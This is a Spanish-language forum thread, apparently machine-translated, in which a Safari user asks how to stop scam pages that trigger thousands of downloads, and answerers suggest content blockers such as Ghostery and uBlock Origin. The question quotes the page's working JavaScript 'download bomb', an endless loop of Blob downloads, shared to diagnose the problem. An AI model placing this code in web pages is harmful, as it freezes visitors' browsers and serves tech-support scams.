8 votos

Pirooz avatar

Evitar Spam descargas en Safari

Preguntado el 7 de Julio, 2018
Cuando se hizo la pregunta
309 visitas
Cuantas visitas ha tenido la pregunta
2 Respuestas
Cuantas respuestas ha tenido la pregunta
Abierta
Estado actual de la pregunta

De fondo

Un nuevo spam página ha empezado a aparecer a lo largo de muchos "cuestionable" sitios (webs de películas, etc.). Esta nueva spam de la página se adapta a la categoría de las exploraciones falsas, MacKeeper, "TIENE UN VIRUS", etc. categoría.

Problema

El problema con esta nueva página es que en lugar de tener una ventana emergente, realmente la página inicia una descarga de un azar 2kb (no dañino sólo contiene texto aleatorio) archivos repetidamente cada ~1ms. La carpeta de descarga se llena antes de que usted puede cerrar la ventana y lo que queda es la eliminación de más de 1000 archivos. A diferencia, un problema similar en el que una página de spam abre el cuadro de diálogo imprimir, hay muy poco tiempo para reaccionar.

Fracasaron Los Intentos De Solución De Problemas

  • Traté de bloquear la carpeta de descarga. Mientras que impidió que las descargas desde...bueno...la descarga, un cuadro de diálogo (ver imagen). Por lo general, yo sólo podría cerrar este cuadro de diálogo, pero ya que la descarga se trató de cada ~1 ms, yo un nuevo cuadro de diálogo aparece cada vez que intento cerrar, me impide cerrar la ventana.

  • Forzar la salida de Safari, la cual se detiene la descarga (después de 1k de descargas), pero luego me suelto todos mis otros windows

  • Cambiar la configuración de 'Preguntar por cada descarga' en las preferencias de Safari. No funciona porque 1k de separar los cuadros de diálogo abrir me impide incluso el cierre de la ficha. Finalmente estrellarse Safari.

enter image description here

enter image description here

Pregunta

¿Cómo puedo prevenir el spam, descargas de Safari?

ACTUALIZACIÓN:

Aquí está el código que causa la descarga (lo consiguió mediante la desactivación de JavaScript y mirando a través de código manualmente):

 function download(g, h, j) {
                var k = new Blob([g], {
                        type: j
                });
                if (window.navigator.msSaveOrOpenBlob) window.navigator.msSaveOrOpenBlob(k, h);
                else {
                        var l = document.createElement("a"),
                                m = URL.createObjectURL(k);
                        l.href = m, l.download = h, l.click(), setTimeout(function() {}, 0)
                }
        }
        function bomb_ch() {
                var g = Math.random().toString(36).substring(20),
                        h = Math.floor(50 * Math.random() + 25);
                while (true) download(h, g, g)
        }
        function ch_jam() {
                bomb_ch()
        }

Nota: he tenido algunos problemas con el JS en una página personalizada. Se congeló en lugar de descargar. Yo era capaz de emular la descarga mediante el uso de un setInterval() función de llamar a un la download función.

Más info: https://blog.malwarebytes.com/malwarebytes-news/2018/02/tech-support-scammers-find-new-way-jam-google-chrome/

Preguntado el 7 de Julio, 2018 por Pirooz

Respuestas

¿Demasiados anuncios?

5voto

Oskar avatar
Oskar Puntos 1242

¿No sería este un buen caso para un Safari bloqueador de contenidos / javascript bloqueador que es selectiva?

Ghostery podría ser un buen lugar para empezar en el Mac para ver si se puede usar reglas predefinidas para anular cross-site scripting (/ anuncios de inyección de código en las páginas web. Por supuesto, si la página es servir hasta que el contenido directamente deberás desactivar javascript en la página en su totalidad o tomar nota y bloquear aquellos sitios que mierda tu experiencia intencionalmente o debido a la venta del anuncio de la inyección para cualquier persona con los medios para pagar este asustar a la vajilla y la estafa de la vajilla.

Si quería ser más precisos - GreaseMonkey tipo de usuario scrips podría combatir esto con suficiente JS conocimiento de su parte (o encontrar a alguien que escribió el guión para el bloque de hoy iteración de este malware).

Nuevas versiones del sistema operativo de Safari podría ayudar a reducir este un poco, pero no hay dinero para ser realizado por personas que ofrecen este montón de basura para tu Mac, así que lo más probable es que se adaptan a cualquier tecnología que intenta que sea fácil de bloquear. A menos que usted está dispuesto a gastar más dinero apoyando a una empresa que mantiene una biblioteca de configuraciones que pueden "whack-a-mole" y adaptarse más rápido que el de los charlatanes pueden cocinar de nuevo código en su sala de calderas.

También tendrás que decidir si los sitios web que ello también son charlatanes que son parte de la estafa , ya que deben saber que esto está ocurriendo a usted, uno de los visitantes que de acogida.

Respondido el 14 de Julio, 2018 por Oskar (1242 Puntos )

5voto

Mapad avatar
Mapad Puntos 3033

Mientras que hay muchos capaces bloqueadores de anuncios para Safari, hay muchas menos opciones de espectro más amplio, basado en extensiones de contenido-bloqueantes. De esos, sólo destacan dos: Ghostery y uBlockOrigin [información enlace: https://github.com/gorhill/uBlock enlace de descarga: https://safari-extensions.apple.com/?q=ublock%20origin.

EDIT: no hay que confundir uBlock Origen con el nombre similar uBlock,. Los dos productos son muy diferentes de los de capacidad y reputación.

Puede hacer lo que usted desea y evitar la descarga de bombardeo tus amigos y con experiencia? Sí, con la distinción que Ghostery necesitaría algunas reglas de personalización donde uBlockOrigin es establecida como predeterminada.

Sé que uBlockOrigin bloqueado este particular explotar un mes antes de la Malwarebytes anuncio en el "Más info". Yo no sé acerca de Ghostery de la línea de tiempo.

Yo recomendaría que usted les den un juicio.

Respondido el 14 de Julio, 2018 por Mapad (3033 Puntos )

Preguntas relacionadas

Preguntas Destacadas

Etiquetas mas usadas

En nuestra red

AppleAyuda.com

AppleAyuda es una comunidad de usuarios de los productos de Apple en la que puedes resolver tus problemas y dudas.
Puedes consultar las preguntas de otros usuarios, hacer tus propias preguntas o resolver las de los demás.

Powered by:

Yandex
X